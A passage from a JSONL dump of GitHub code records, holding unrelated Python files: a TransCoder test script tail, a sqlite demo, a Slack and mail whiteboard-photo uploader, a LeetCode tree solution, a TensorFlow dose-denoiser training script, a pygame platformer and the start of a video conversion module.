('cRN SgYjPsctJ',),\n ('434',),\n ('1',),\n ('JRfZIAsbrPBZ',),\n ('03779368305592',),\n ('1111000',),\n ('BkULuIi',)\n ]\n n_success = 0\n for i, parameters_set in enumerate(param):\n if f_filled(*parameters_set) == f_gold(*parameters_set):\n n_success+=1\n print(\"#Results: %i, %i\" % (n_success, len(param)))","repo_name":"facebookresearch/TransCoder","sub_path":"data/evaluation/geeks_for_geeks_successful_test_scripts/python/LONGEST_REPEATING_SUBSEQUENCE.py","file_name":"LONGEST_REPEATING_SUBSEQUENCE.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":1646,"dataset":"github-code","pt":"3"} +{"seq_id":"43344524869","text":"#coding:euc-kr\nimport sqlite3\n#\ndef select_b():\n\n conn = sqlite3.connect(\"testdb.db\")\n\n cur = conn.cursor()\n\n cur.execute('select * from test')\n\n print('[1] 전체 데이터 출력하기')\n\n rs = cur.fetchall()\n\n for book in rs :\n print(book)\n\n conn.close()\n#\nif __name__ == \"__main__\":\n select_b()","repo_name":"richinhim/python_1216","sub_path":"db_demo1.py","file_name":"db_demo1.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33290515282","text":"__license__ = \"GNU GPLv3\"\n__docformat__ = 'reStructuredText'\n\nfrom time import time\nfrom .feedbacker import send_feedback, Message\nfrom .mailer import send_mail, send_reminder\nfrom .read_config import get_key, get_bool_key\nfrom .slack_processor import SlackBot\n\n\ndef upload_to_slack(pictures, slack_bot):\n \"\"\"Uploads the pictures to slack and a message depending on request situation.\n\n Checks the temp request file for a request and sends messages depending on,\n if there is a request.\n If the last request ran out, this person is getting notified.\n If not, tell person, trigger has been received.\n Upload to slack\n \"\"\"\n channel = get_key('Slack', 'channel_name')\n\n request = slack_bot.queue.get()\n\n if request['request']:\n if time() <= request['ts']:\n message = \"Received the trigger in 
time, you will get the photo!\"\n channel = request['channel']\n\n else:\n # Hmm, this should never happen ... keep it in, just to be sure\n message = \"Hey, sorry but you missed your request window, but I told you that.\"\n\n SlackBot.send_ephemeral_message(SlackBot,\n msg=message,\n user=request['user'],\n channel=request['channel'])\n\n # Make sure we pick the right file\n\n SlackBot.upload_file(SlackBot, pictures[0], channel)\n\n send_feedback(Message.UPLOAD)\n\n if get_bool_key('Output', 'enhance'):\n SlackBot.upload_file(SlackBot, pictures[1], channel)\n\n if request['request']:\n request['request'] = False\n request['user'] = None\n request['real_name'] = None\n request['channel'] = None\n request['ts'] = float(get_key('Slack', 'request_period'))\n slack_bot.queue.put(request)\n print(\"after slack upload\")\n\n\ndef upload_by_mail(pictures, mail_list):\n \"\"\"Gather mail list, send task to upload.\"\"\"\n addresses = []\n print(mail_list)\n # Mail can be activated but not mapped to this button\n if len(mail_list) > 0:\n print(\"mail list has mails in it\")\n for mail_num in mail_list:\n addresses.append(get_key(mail_num, \"address\"))\n print(\"after action\")\n\n send_mail(addresses, pictures)\n else:\n print(\"Mail activated but no mails choosen on this button\")\n print(\"after mail upload\")\n\n\ndef get_upload_targets():\n \"\"\"Construct and return unset dict of targets.\"\"\"\n # Possible actions:\n # normal All available targets\n # all_mail All available emails\n # [slack]{, Mail#} Only specific emails and/or slack\n upload_targets = {'slack': False}\n for mail in range(int(get_key('Output', 'num_mail'))):\n upload_targets['mail_' + str(mail)] = False\n\n return upload_targets\n\n\ndef set_upload_targets(actions):\n \"\"\"Translate meta targets into actual targets, set them accordingly and return.\"\"\"\n upload_targets = get_upload_targets()\n slack = get_bool_key('Output', 'slack')\n email = get_bool_key('Output', 'mail')\n # A little bit long but very explicit about what should happen\n if actions[0] == \"normal\":\n if slack:\n upload_targets['slack'] = True\n if email:\n for mail in range(int(get_key('Output', 'num_mail'))):\n upload_targets['Mail' + str(mail)] = True\n elif actions[0] == \"all_mail\":\n if email:\n for mail in range(int(get_key('Output', 'num_mail'))):\n upload_targets['Mail' + str(mail)] = True\n else:\n for action in actions:\n if action in upload_targets:\n upload_targets[action] = True\n\n return upload_targets\n\n\ndef save_all_targets(all_targets, targets):\n \"\"\"Set actual targets from button to dict.\"\"\"\n # FIXME: Seems a bit convoluted.\n for action, activated in targets.items():\n all_targets[action] = activated or all_targets[action]\n return all_targets\n\n\ndef send_reminders(all_targets):\n \"\"\"Send reminders for unsent pictures because of internet outage.\"\"\"\n mail_list = []\n msg = \"There are unsent pictures on the Whiteboardbot SD-Card, \\\n because of an Internet outage on the last trigger. 
\\\n They are automatically going to get deleted in 30 days.\"\n for action, activated in all_targets.items():\n if activated:\n if action == 'slack':\n SlackBot.send_message(SlackBot, msg, attachment=None,\n channel=get_key(\"Slack\", \"channel_name\"))\n else:\n mail_list.append(action)\n if len(mail_list) > 0:\n addresses = []\n print(mail_list)\n for mail_num in mail_list:\n addresses.append(get_key(mail_num, \"address\"))\n # TODO check if this handover worked correctly\n send_reminder(addresses, msg)\n\n return time()\n\n\ndef upload(button, pictures, enhancer=None, slack_bot=None):\n \"\"\"Check upload targets and upload accordingly.\"\"\"\n # TODO Test this\n\n # bool(int('1'))) ? I know, I'm fun at parties\n email = get_bool_key('Output', 'mail')\n\n actions = eval(button['action'])\n\n upload_targets = set_upload_targets(actions)\n\n mail_list = []\n # Why trust positions of file names, if we could trust,\n # that files ready for upload are always *.jpg\n uploads = []\n\n for picture in pictures:\n if picture.find(\".jpg\") != -1:\n uploads.append(picture)\n if enhancer is not None:\n enhancer.join() # Waits until enhancer terminates\n\n for action, activated in upload_targets.items():\n if activated:\n if action == 'slack':\n upload_to_slack(uploads, slack_bot)\n else: # Can only be either slack or mail\n mail_list.append(action)\n if email:\n upload_by_mail(uploads, mail_list)\n\n print(\"done uploading\")\n","repo_name":"alindl/whiteboardbot","sub_path":"uploader.py","file_name":"uploader.py","file_ext":"py","file_size_in_byte":5933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25336153090","text":"# recursion\r\n# Runtime: 52 ms, faster than 41.56% of Python3 online submissions for Trim a Binary Search Tree.\r\n# Memory Usage: 16.8 MB, less than 100.00% of Python3 online submissions for Trim a Binary Search Tree.\r\n# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution:\r\n def trimBST(self, root: TreeNode, L: int, R: int) -> TreeNode:\r\n if not root:\r\n return None\r\n elif root.val > R:\r\n return self.trimBST(root.left, L, R)\r\n elif root.val < L:\r\n return self.trimBST(root.right, L, R)\r\n else:\r\n root.left = self.trimBST(root.left, L, R)\r\n root.right = self.trimBST(root.right, L, R)\r\n return root\r\n","repo_name":"daidai21/Leetcode","sub_path":"Algorithms/Python3.x/669-Trim_a_Binary_Search_Tree.py","file_name":"669-Trim_a_Binary_Search_Tree.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"43598721639","text":"import sys\nimport os\nimport json\nimport shutil\nfrom os.path import join as pjoin\nimport logging\nfrom collections import namedtuple\nfrom datetime import datetime\nfrom pprint import pprint, pformat\n\nimport absl.logging\nimport numpy as np\nimport scipy.stats\nimport tensorflow as tf\nfrom tensorflow import keras\n\nfrom . 
import actions, argparser, weights, losses\nfrom .dataloader import DataLoaderNpyFiles\nfrom .models.unetdenoiser import UNetDenoiser, UNetDenoiserStatic, ModelWrapper, pad_for_unet, unpad_from_unet\nfrom .utils import get_unique_run_name, load_bin, save_bin, save_config, load_config, combine_config\nfrom .tf_functions import tf_normalize, tf_log\n\n# tf.autograph.set_verbosity(6, alsologtostdout=True)\n# tf.debugging.set_log_device_placement(True)\n\ntimestamp = datetime.now().strftime(\"%Y-%m-%d_%T\")\n\nlogger = logging.getLogger(\"MCDose.\"+__name__)\nIOPaths = namedtuple('IOPaths', ('rundir', 'logdir', 'checkpointdir',\n 'tflogdir', 'resultsdir', 'datadir'))\n\n\ndef main():\n # configuration common to all \"actions\"\n ## workaround to intrusive abseil logger in TF2.0 (double logging)\n logging.root.removeHandler(absl.logging._absl_handler)\n absl.logging._warn_preinit_stderr = False\n rootlogger = logging.getLogger('MCDose')\n rootlogger.setLevel(args.loglevel)\n rootlogger.addHandler( logging.StreamHandler() )\n\n if args.seed:\n np.random.seed(args.seed)\n\n distribute_strategy = None\n if args.cpu:\n # set GPU restrictions\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = ''\n logger.debug(\"Processing Mode: CPU\\n\")\n distribute_strategy = default_distribute_strategy(cpu=True)\n else:\n # set GPU restrictions\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(args.gpu)\n logger.debug(\"Processing Mode: GPU (#{})\\n\".format(args.gpu))\n distribute_strategy = default_distribute_strategy()\n\n # check eager mode\n logger.info('Tensorflow is running in {} mode'.format(\n 'EAGER' if tf.executing_eagerly() else \"GRAPH\"\n ))\n\n # initialize global runs folder\n allrunsdir = args.rundir\n os.makedirs(allrunsdir, exist_ok=True)\n\n # One-Off Actions\n if args.clean_runs:\n clean_runs(allrunsdir)\n sys.exit(0)\n\n # decide on this run's name\n rundir = None\n if args.run is not None:\n # trying to specify an existing run...match on integer, not string\n for d in os.listdir(allrunsdir):\n try:\n if os.path.isdir(pjoin(allrunsdir, d)) and int(d)==int(args.run):\n rundir = d\n break\n except: pass\n\n if rundir is None:\n rundir = get_unique_run_name(allrunsdir)\n rundir = pjoin(allrunsdir, rundir)\n\n # configure run paths with optional memo\n memo = (('-'+args.memo) if args.memo else '')\n rundir = rundir+memo\n iopaths = IOPaths(**{\n 'rundir': rundir,\n 'logdir': pjoin(rundir, 'logs'),\n 'checkpointdir': pjoin(rundir, 'checkpoints'),\n 'tflogdir': pjoin(rundir, 'tflogs'),\n 'resultsdir': pjoin(rundir, 'results' + memo),\n 'datadir': args.datadir,\n })\n # ensure output directories exist\n os.makedirs(rundir, exist_ok=True)\n for d in (iopaths.checkpointdir,\n iopaths.logdir,\n iopaths.tflogdir,\n iopaths.resultsdir):\n os.makedirs(d, exist_ok=True)\n\n # combine cmdline args, general config, and run config (if existing run is used)\n try:\n config = load_config(iopaths.rundir)\n except FileNotFoundError:\n config = load_config(args.config)\n config = combine_config(\n {\n 'timestamp': timestamp,\n 'datadir': iopaths.datadir,\n 'seed': args.seed,\n 'memo': args.memo,\n },\n config,\n )\n # override config settings with cmdline args\n config = combine_config(\n {\n 'batch_size': vars(args).get('batch_size', None),\n },\n config,\n )\n save_config(iopaths.rundir, config)\n\n # initiate logging\n setup_logging(args.action, iopaths)\n\n # launch selected action\n actionfunc = globals()[args.action]\n if callable(actionfunc):\n actionfunc(config, iopaths, distribute_strategy)\n else:\n raise 
ValueError('Action \"{}\" is not supported'.format(args.action))\n sys.exit(1)\n\ndef setup_logging(action, iopaths):\n # deterimine runtime state\n action = args.action\n\n # finish logging setup\n logfilename = pjoin(iopaths.logdir, 'log-'+action+'.txt')\n filehandler = logging.FileHandler(logfilename)\n rootlogger = logging.getLogger('MCDose')\n rootlogger.addHandler( filehandler )\n tflogger = tf.get_logger()\n tflogger.addHandler(filehandler)\n\ndef train(config, iopaths, distribute_strategy):\n # override config settings with cmdline args\n config = combine_config(\n {\n 'learning_rate': vars(args).get('learning_rate', None),\n 'learning_rate_decay': vars(args).get('learning_rate_decay', None),\n 'nepochs': vars(args).get('nepochs', None),\n 'steps_per_epoch': vars(args).get('steps_per_epoch', None),\n },\n config,\n )\n\n # set defaults if they havent been set on cmdline or in config file\n config['batch_size'] = config.get('batch_size', 30)\n config['learning_rate'] = config.get('learning_rate', 1e-2)\n config['learning_rate_decay'] = config.get('learning_rate_decay', 0.985)\n\n save_config(iopaths.rundir, config)\n\n # setup loss function per-sample weighting\n # TODO: refactor into common selector class\n wfuncconfig = config['sample_weights']\n supported_wfuncs = {\n None: lambda **kwargs: None,\n 'lin_norm_sum': weights.sample_lin_norm_sum,\n 'exp_norm_sum': weights.sample_exp_norm_sum,\n }\n wfunctype = wfuncconfig['type']\n if wfunctype not in supported_wfuncs:\n raise ValueError('Loss weighting function \"{}\" is not supported. Must be one of {!s}'.format(wfunctype, list(supported_wfuncs.keys())))\n wfunc = supported_wfuncs[wfunctype](**wfuncconfig.get(wfunctype, {}))\n\n logger.info('Loading TRAINING data from \"{}\":'.format(iopaths.datadir))\n if not iopaths.datadir or not os.path.isdir(iopaths.datadir):\n raise RuntimeError('Training data folder (datadir) could not be located at \"{}\"'.format(iopaths.datadir))\n train_dataloader = DataLoaderNpyFiles.fromFolder(\n pjoin(iopaths.datadir, 'train'),\n config['batch_size'],\n weight_func=wfunc,\n full_batches_only=True,\n cache_size=args.cache_size,\n limit=args.cache_size if args.cache_only else None,\n randomization=DataLoaderNpyFiles.Randomization.Shuffle\n )\n val_dataloader = DataLoaderNpyFiles.fromFolder(\n pjoin(iopaths.datadir, 'validate'),\n config['batch_size'],\n weight_func=wfunc,\n full_batches_only=False,\n cache_size=args.cache_size,\n limit=args.cache_size if args.cache_only else None,\n randomization=DataLoaderNpyFiles.Randomization.NoShuffle\n )\n\n # copy normalization statistics if available in dataset\n statsfile = pjoin(iopaths.datadir, 'stats.json')\n if os.path.isfile(statsfile):\n shutil.copy2(statsfile, pjoin(iopaths.rundir, 'normstats.json'))\n\n if args.debug:\n ndebugbatches = 3\n logger.info('Only using {} batches for debugging'.format(ndebugbatches))\n train_dataloader.num_batches = ndebugbatches\n val_dataloader.num_batches = ndebugbatches\n\n # optionally, train on subset of dataset\n config['steps_per_epoch'] = max(1, min(len(train_dataloader),\n config.get('steps_per_epoch') if config.get('steps_per_epoch', None) is not None else len(train_dataloader)\n ))\n\n # is user hoping to load existing model, or requiring it?\n if args.resume:\n load_model = 'force'\n elif args.run:\n load_model = 'try'\n else:\n load_model = False\n\n model = create_model(config['model'], distribute_strategy, load_model=load_model, checkpointdir=iopaths.checkpointdir)\n prepare_model(model, train_dataloader, 
config, distribute_strategy=distribute_strategy)\n\n\n actions.train_custom(model, train_dataloader, val_dataloader, config, iopaths,\n distribute_strategy, 0, iopaths.tflogdir)\n # actions.train(**{\n # 'model': model,\n # 'train_dataloader': train_dataloader,\n # 'val_dataloader': val_dataloader,\n # 'config': config,\n # 'iopaths': iopaths,\n # 'distribute_strategy': distribute_strategy,\n # 'gamma_freq': (-1 if not args.gamma else 20),\n # 'tflogdir': iopaths.tflogdir,\n # })\n\n\ndef test(config, iopaths, distribute_strategy):\n \"\"\"average over all test set slices\"\"\"\n # test trained model\n logger.info('Loading TESTING data:')\n test_dataloader = DataLoaderNpyFiles.fromFolder(pjoin(iopaths.datadir, 'test'), config['batch_size'], full_batches_only=False)\n\n # force testing on single GPU\n distribute_strategy = default_distribute_strategy(single_device=True)\n\n model = get_trained_model(\n config['model'],\n weights=iopaths.checkpointdir,\n normstats=pjoin(iopaths.rundir, 'normstats.json'),\n distribute_strategy=distribute_strategy,\n )\n\n inputs = keras.Input(shape=(None, None, None, 2))\n noop_model = keras.Model(inputs, inputs[...,0,None])\n\n for this_model, baseline in ((model, False), (noop_model, True)):\n # actions.test(this_model, test_dataloader, config, iopaths, distribute_strategy, test_plots=args.test_plots,\n actions.test_custom(this_model, test_dataloader, config, iopaths, distribute_strategy, test_plots=args.test_plots,\n baseline=baseline, gamma=args.gamma)\n\n\ndef predict(config, iopaths, distribute_strategy):\n assert len(args.data_in) > 0\n assert len(args.data_size) > 0\n\n model = get_trained_model(\n config['model'],\n weights=iopaths.checkpointdir,\n normstats=pjoin(iopaths.rundir, 'normstats.json'),\n distribute_strategy=distribute_strategy,\n )\n\n for ii, fname in enumerate(args.data_in):\n assert os.path.isfile(fname)\n inputs = load_bin(fname, args.data_size, add_channel_axis=True, norm=True)\n\n pred_dose = model.predict(inputs, batch_size=config['batch_size'])\n\n if len(args.data_in)>1:\n outname = args.pred_out+str(ii)+'.bin'\n else:\n outname = args.pred_out\n save_bin(outname, pred_dose[:,:,:,0] )\n\n\ndef create_model(modelconfig, distribute_strategy=None, load_model=False, checkpointdir=None):\n \"\"\" modelconfig is expected to be the subset of the full config, specific to the model \"\"\"\n if distribute_strategy is None:\n distribute_strategy = default_distribute_strategy()\n\n # only proceed to create model if failed to load\n with distribute_strategy.scope():\n supported_models = {\n 'static': ModelWrapper(UNetDenoiserStatic),\n 'unet': UNetDenoiser,\n }\n modeltype = modelconfig['type']\n if modeltype not in supported_models:\n raise ValueError('Model \"{}\" is not supported. Must be one of {!s}'.format(modeltype, list(supported_models.keys())))\n model = supported_models[modeltype](**modelconfig.get(modeltype, {}))\n\n if load_model:\n if os.path.isfile(checkpointdir):\n model_path = checkpointdir\n else:\n model_path = pjoin(checkpointdir, 'weights.hdf5')\n\n try:\n model.load_weights(model_path)\n logger.info('Loaded model from \"{}\"'.format(model_path))\n except Exception as e:\n if load_model == 'force':\n logger.error('Failed to reload model checkpoint from \"{}\"'.format(model_path))\n raise\n elif load_model == 'try':\n logger.warning('Failed to reload model checkpoint from \"{}\". Randomly initializing model'.format(model_path))\n else:\n logger.error('model load strategy \"{!s}\" is invalid. 
Must be one of {!s}'.format(load_model, ['force', 'try']))\n sys.exit(1)\n\n return model\n\ndef prepare_model(model, dataloader, config, distribute_strategy):\n lr_schedule = keras.optimizers.schedules.ExponentialDecay(\n initial_learning_rate=float(config['learning_rate']),\n decay_steps=int(config.get('steps_per_epoch')) if config.get('steps_per_epoch', None) is not None else len(dataloader),\n decay_rate=float(config['learning_rate_decay']),\n staircase=False,\n )\n\n # configure optimizer\n optconfig = config['optimizer']\n supported_optimizers = {\n 'sgd': keras.optimizers.SGD,\n 'adam': keras.optimizers.Adam,\n 'rmsprop': keras.optimizers.RMSprop,\n }\n opttype = optconfig['type']\n if opttype not in supported_optimizers:\n raise ValueError('Optimizer \"{}\" is not supported. Must be one of {!s}'.format(opttype, list(supported_optimizers.keys())))\n with distribute_strategy.scope():\n optimizer = supported_optimizers[opttype](**optconfig.get(opttype, {}), learning_rate=lr_schedule)\n\n # configure loss function\n lossconfig = config['loss']\n supported_losses = {\n 'mse': keras.losses.MeanSquaredError,\n 'mae': keras.losses.MeanAbsoluteError,\n 'mse_tv': losses.MeanSquaredErrorTV,\n }\n losstype = lossconfig['type']\n if losstype not in supported_losses:\n raise ValueError('Loss function \"{}\" is not supported. Must be one of {!s}'.format(losstype, list(supported_losses.keys())))\n loss_function = supported_losses[losstype](**lossconfig.get(losstype, {}))\n\n # finalize model based on input data shape\n with distribute_strategy.scope():\n model.compile(\n optimizer=optimizer,\n loss=loss_function,\n metrics=[\n keras.metrics.MeanSquaredError(),\n keras.metrics.MeanAbsoluteError(),\n # metrics.NMAEMetric(),\n # metrics.MaskedNMAEMetric(threshold=0.2),\n ],\n )\n\n input_shape = dataloader[0][0].shape\n model.build((None, *input_shape[1:]))\n\n model.summary()\n return model\n\ntrained_model = None\ndef get_trained_model(config, weights, normstats=None, distribute_strategy=None):\n global trained_model\n if trained_model:\n return trained_model\n if isinstance(config, str):\n config = load_config(config)['model']\n if not isinstance(distribute_strategy, tf.distribute.Strategy):\n distribute_strategy = default_distribute_strategy()\n\n model = create_model(config, distribute_strategy, load_model='force', checkpointdir=weights)\n\n # Wrap model with normalization prestage matching that from training\n if normstats:\n if isinstance(normstats, str):\n with open(normstats, 'r') as fd:\n stats = json.load(fd)\n\n mean = tf.constant([stats['mean'][0], stats['mean'][2]], dtype=tf.float32, shape=(1,1,1,1,2))\n std = tf.constant([stats['std'][0], stats['std'][2]], dtype=tf.float32, shape=(1,1,1,1,2))\n inputs = keras.Input(shape=(None,None,None,2), dtype=tf.float32)\n x = (inputs-mean)/std # normalize\n\n x, orig_size = pad_for_unet(x, nscales=3)\n x = model(x) # predict\n x = unpad_from_unet(x, orig_size)\n\n outputs = x*std[...,0,None]+mean[...,0,None] # un-normalize\n model = keras.Model(inputs, outputs)\n trained_model = model\n return model\n\ndef default_distribute_strategy(cpu=False, single_device=False):\n if cpu:\n return tf.distribute.OneDeviceStrategy(device='/cpu:0')\n\n devices = tf.config.list_logical_devices(\"GPU\")\n if not devices:\n return tf.distribute.OneDeviceStrategy(device='/cpu:0')\n elif devices and len(devices)>1 and not single_device:\n return tf.distribute.MirroredStrategy(devices=devices)\n elif devices and len(devices)==1 or single_device:\n return 
tf.distribute.OneDeviceStrategy(device=devices[0])\n\ndef clean_runs(allrunsdir):\n \"\"\"Analyze each 'run' folder in 'allrunsdir' and delete those that have no valuable training data, such as\n a valid training checkpoint or tflogs files\"\"\"\n runs_to_delete = []\n for d in sorted(os.listdir(allrunsdir)):\n rundir = pjoin(allrunsdir, d)\n checkpoint_index = pjoin(rundir, 'checkpoints', 'checkpoint')\n weights_file = pjoin(rundir, 'checkpoints', 'weights.hdf5')\n if os.path.isfile(checkpoint_index) or os.path.isfile(weights_file):\n continue\n else:\n runs_to_delete.append(rundir)\n\n if not runs_to_delete:\n logger.info('Nothing to delete. exiting...')\n sys.exit(0)\n\n logger.warning(\"Runs to be deleted: \\n{}\".format(pformat(runs_to_delete)))\n user_response = input(\"Are you sure you want to delete these runs [y/N]: \")\n if not user_response.lower() in ('y', 'yes'):\n logger.warning('Aborted!')\n else:\n for rundir in runs_to_delete:\n try:\n shutil.rmtree(rundir)\n logger.info('Deleted run directory \"{}\"'.format(rundir))\n except Exception as e:\n logger.warning('Failed to delete run directory \"{}\"'.format(rundir))\n logger.debug('Error details: {!s}'.format(e))\n\n#=================================================================================\n\n# Entry point for CLI\nif __name__ == \"__main__\":\n args = argparser.parse_args()\n main()\n","repo_name":"qihuilyu/P2T","sub_path":"MC simulation/mcdose/mcdose/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":17745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"12290118298","text":"import pygame \nvec = pygame.math.Vector2\n\n\nclass Personagem1(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/personagem/personagem1frente.png\")\n self.rect = self.image.get_rect()\n self.rect.top = 475\n self.rect.left = 575\n self.rect.left = 200\n self.rect.right = 210\n\nclass Personagem2(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/personagem/personagem2frente.png\")\n self.rect = self.image.get_rect()\n self.rect.top = 475\n self.rect.left = 575\n self.rect.left = 200\n self.rect.right = 405\n\nclass Personagem(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/personagem/personagem1frente_min.png\")\n self.rect = self.image.get_rect()\n self.rect.center= (400,100)\n self.rect.top = 800\n self.rect.left = 228\n self.rect.right = 228\n self.pos = vec(800,800)\n self.vel = vec(0, 0)\n self.acc = vec(0, 0)\n\n def update(self):\n self.acc = vec(0, 0)\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n self.acc.x = -0,5\n if keys[pygame.K_RIGHT]:\n self.acc.x = 0,5\n\n # apply friction\n self.acc += self.vel * (-0.12)\n # equations of motion\n self.vel += self.acc\n self.pos += self.vel + 0.5 * self.acc\n # wrap around the sides of the screen\n if self.pos.x > 500:\n self.pos.x = 0\n self.rect.left = self.pos.x\n if self.pos.x < -10:\n self.pos.x = 500\n\n self.rect.center = self.pos\n \nclass Selecao(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/personagem/selecao.png\")\n self.rect = self.image.get_rect()\n self.rect.top = 470\n self.rect.right = 800\n\nclass Plataformas(pygame.sprite.Sprite):\n def __init__(self):\n 
pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/Primeira Fase/plataforma.png\")\n self.rect = self.image.get_rect()\n self.rect.top = 200\n self.rect.left = 200\n\nclass Paginainicial(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/Página inicial/paginainicial2.png\")\n self.rect = self.image.get_rect()\n self.rect.top = -26\n self.rect.left = -16\n\nclass Botaoplay(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/Página inicial/play.png\")\n self.rect = self.image.get_rect()\n self.rect.top = 342\n self.rect.bottom = 391\n self.rect.left = 199\n self.rect.right = 314\n\nclass Bolinha(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/Primeira Fase/bolinha.png\")\n self.rect = self.image.get_rect()\n self.rect.top = 120\n self.rect.bottom = 200\n self.rect.left = 250\n self.rect.right = 300\n\nclass Iconefinal(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/Primeira Fase/iconefinal.png\")\n self.rect = self.image.get_rect()\n self.rect.top = 120\n self.rect.bottom = 200\n self.rect.left = 280\n self.rect.right = 300\n\n\ndef main():\n\n #Inicialização\n pygame.init()\n tela = pygame.display.set_mode([500,650])\n pygame.display.set_caption(\"Jogo PETEEL\")\n relogio = pygame.time.Clock()\n all_sprites = pygame.sprite.Group()\n fundo = pygame.image.load(\"Imagens/Primeira Fase/fundo123desfocado.png\")\n\n #CORES\n cor_azul = (181,244,253)\n\n #Variaveis\n pag_inicial= Paginainicial()\n all_sprites.add(pag_inicial)\n botaoplay= Botaoplay()\n all_sprites.add(botaoplay)\n personagem= Personagem()\n all_sprites.add(personagem)\n personagem1= Personagem1()\n all_sprites.add(personagem1)\n personagem2= Personagem2()\n all_sprites.add(personagem2)\n selecao= Selecao()\n all_sprites.add(selecao)\n plataforma1 = Plataformas()\n #all_sprites.add(plataforma1)\n iconefinal= Iconefinal()\n #all_sprites.add(iconefinal)\n bolinha= Bolinha()\n #all_sprites.add(bolinha)\n\n sair = False\n while sair != True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sair = True\n \n #Parametros\n relogio.tick(30)\n tela.fill(cor_azul)\n (xmouse, ymouse) = pygame.mouse.get_pos()\n\n #Código Página inicial\n if xmouse >= personagem1.rect.left and xmouse <= personagem1.rect.right and ymouse <= personagem1.rect.bottom and ymouse >= personagem1.rect.top:\n if event.type == pygame.MOUSEBUTTONDOWN:\n personagem.image = pygame.image.load(\"Imagens/personagem/personagem1frente_min.png\") #personagem1frente\n personagem.rect = personagem.image.get_rect()\n personagem.rect.center = (800,800)\n selecao.rect.right = 217\n\n if xmouse >= personagem2.rect.left and xmouse <= personagem2.rect.right and ymouse <= personagem2.rect.bottom and ymouse >= personagem2.rect.top:\n if event.type == pygame.MOUSEBUTTONDOWN:\n personagem.image = pygame.image.load(\"Imagens/personagem/personagem2frente_min.png\") #personagem1frente\n personagem.rect = personagem.image.get_rect()\n personagem.rect.center=(800,800)\n selecao.rect.right = 412\n \n if xmouse >= botaoplay.rect.left and xmouse <= botaoplay.rect.right and ymouse <= 351 and ymouse >= 295:\n if event.type == pygame.MOUSEBUTTONDOWN:\n pag_inicial.rect.left = 800\n botaoplay.rect.left = 800\n personagem1.rect.left = 800\n 
personagem2.rect.left = 800\n personagem.rect.center = (228,200)\n personagem.pos = vec(228,200)\n selecao.rect.right = 800\n fundo = pygame.image.load(\"Imagens/Primeira Fase/fundo1_1.png\")\n\n #Código Movimento do personagem\n personagem.acc = vec(0, 0.5)\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n personagem.acc.x = -0.5\n\n if keys[pygame.K_RIGHT]:\n personagem.acc.x = 0.5\n \n personagem.acc.x += personagem.vel.x * (-0.12)\n personagem.vel += personagem.acc\n personagem.pos += personagem.vel + 0.5 * personagem.acc\n\n if personagem.pos.x > 500:\n personagem.pos.x = 0\n if personagem.pos.x < 0:\n personagem.pos.x = 500\n\n personagem.rect.center = personagem.pos\n\n \n #Desenhar\n tela.blit(fundo, (0,0))\n all_sprites.draw(tela)\n\n #Updates\n all_sprites.update \n pygame.display.update() \n\n pygame.quit() \nmain()","repo_name":"Victor-J-L/JOGO-PETEEL","sub_path":"primeirafase.py","file_name":"primeirafase.py","file_ext":"py","file_size_in_byte":7296,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37779073493","text":"import re, subprocess, os, json\nfrom lib import user\nfrom lib import errors\nfrom lib import db_object\nfrom lib import files\n# FIXME: Objektbeschreibungsfunktion nach DBObject ausmodularisieren:\nfrom modules import get as get_module\n\ndef process( app ):\n\tquery = app.query\n\tresponse = app.response\n\tsession = app.session\n\tsource_id = int( query.parms[\"id\"] )\n\tmode = query.parms[\"mode\"] if \"mode\" in query.parms else \"convert\"\n\tif app.user.can_read( source_id ):\n\t\tsource_obj = files.File( app, object_id=source_id )\n\t\tif re.match( r\"^video/.*\", source_obj.media_type ):\n\t\t\tnew_poster_offset = float(query.parms[\"poster_offset\"]) if \"poster_offset\" in query.parms else None\n\t\t\tnew_poster_id = int(query.parms[\"poster_id\"]) if \"poster_id\" in query.parms else None\n\t\t\tif new_poster_id and app.user.can_write( source_id ) and app.user.can_read( new_poster_id ):\n\t\t\t\tnew_poster_obj = files.File( app, object_id=new_poster_id )\n\t\t\telse:\n\t\t\t\tnew_poster_obj = None\n\t\t\t# zur Bestimmung der Größen und Bitraten der Alternativobjekte identifizieren wir zunächst das Orignalobjekt:\n\t\t\tsource_size = source_obj.get_size()\n\t\t\tsource_meta = source_obj.identify()\n\t\t\tsource_width = int( source_meta[\"mplayer\"][\"id\"][\"video\"][\"width\"] )\n\t\t\tsource_rate = 